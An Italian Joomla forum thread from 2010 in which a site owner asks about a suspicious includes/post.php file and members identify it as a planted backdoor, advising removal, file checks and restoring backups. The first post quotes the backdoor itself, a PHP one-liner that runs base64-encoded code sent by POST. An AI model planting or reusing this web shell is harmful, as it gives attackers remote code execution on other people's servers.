Joomla.it Forum
Non solo Joomla... => Sicurezza => : bevip 25 Mar 2010, 19:12:57
-
Ragazzi è corretto avere questo file in joomla 15.5.15- Public_html\includes\post.php con il seguente codice?
<?php
eval (base64_decode($_POST["php"]));
?>
-
ciao bevip,
no, non è un file di Joomla.
Consiglio di eliminarlo.
-
Grazie
Sarà fatto
-
ciao bevip,
quel file ha tutto l'aspetto di essere il risultato di un hack del sito: serve a mandare in esecuzione un codice inviato per mezzo di una semplice form html.
oltre a rimuoverlo verifica anche tutti gli altri files, forse ti converrebbe ricaricare tutti i files, o ripristinare l'installazione da un back up.
ciao,
marco
-
Purtroppo e dico purtroppo, anche i backup eseguiti precedentemente sono infetti, nonostante siano stati eseguiti con il sito perfettamente funzionante. Da questo credo si possa dedurre che prima hanno disseminato codice eval() a spaglio tipo in Define.php, indexp.php. ecc.ecc e di tanto in tanto lanciano un robottino che trovando questo codice e cliccando su una ricerca eseguita da google o yahoo ti deviano su un fantomatico sito che nulla a che fare con te. Assomiglia tantissimo come tipologia di attacco a quello eseguito sui siti wordpress 2.7.1. Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla. Ciao e grazie.
-
Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla.
---------------------------------------------------------------------
perchè non c'è una falla,o meglio, se hai il core e tutti gli addons all'ultima versione disponibile questo non accade.
Che senso avrebbe spiegare una falla quando già esiste la patch?
M.
-
non è così semplice spiegare ove sia la falla, sicuramente maurizio ha ragione, se non hai fatto gli aggiornamenti è facile che la falla sia in uno dei componenti installati o in joomla.
btw: avete notato che tutti aggiornano joomla, ma quasi nessuno si preoccupa delle varie estensioni?
in altri casi la causa potrebbe anche essere esogena: un paio di mesi fa un sito di un collaboratore, che era stato preparato da me, è stato spianato perché il vicino di directory non aveva mai effettuato aggiornamenti ed il provider aveva configurato il server alla...
potrebbe poi essere un hack dovuto a programmi propri del server...
come vedi le cause possono essere così tante che è impossibile determinare quella esatta senza accedere al server.
ciao,
marco
-
Ragazzi, capisco che non sia una cosa facile, ed a grandi linee il dubbio è: mi trascino questo problema almeno da gennaio? quando ancora avevo la ver. 15.14 di Joomla?.
o quando ancora non era uscito l'aggiornamento di Ozio G.?
la risposta è senzaltro "si" si ma chi?.
Una cosa però funziona bene: questo forum... :)trovo competenza e velocità nelle risposte. ciao. mi auguro di non rompervi più con questa storia altrimenti, hai mè, Significherebbe rifare completamente tutto il sito.